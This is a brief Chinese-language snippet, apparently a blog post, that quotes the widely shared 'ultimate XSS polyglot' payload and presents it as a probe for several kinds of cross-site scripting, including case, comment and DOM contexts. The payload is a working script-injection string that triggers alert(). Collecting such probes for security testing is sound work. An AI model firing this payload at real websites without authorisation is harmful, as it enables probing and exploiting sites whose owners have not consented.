我超怕的----https:////www.cnblogs.com/iAmSoScArEd/p/12335123.html
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
拿着這個Payload可檢測大小寫、注釋、DOM等多種類型XSS
From:https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot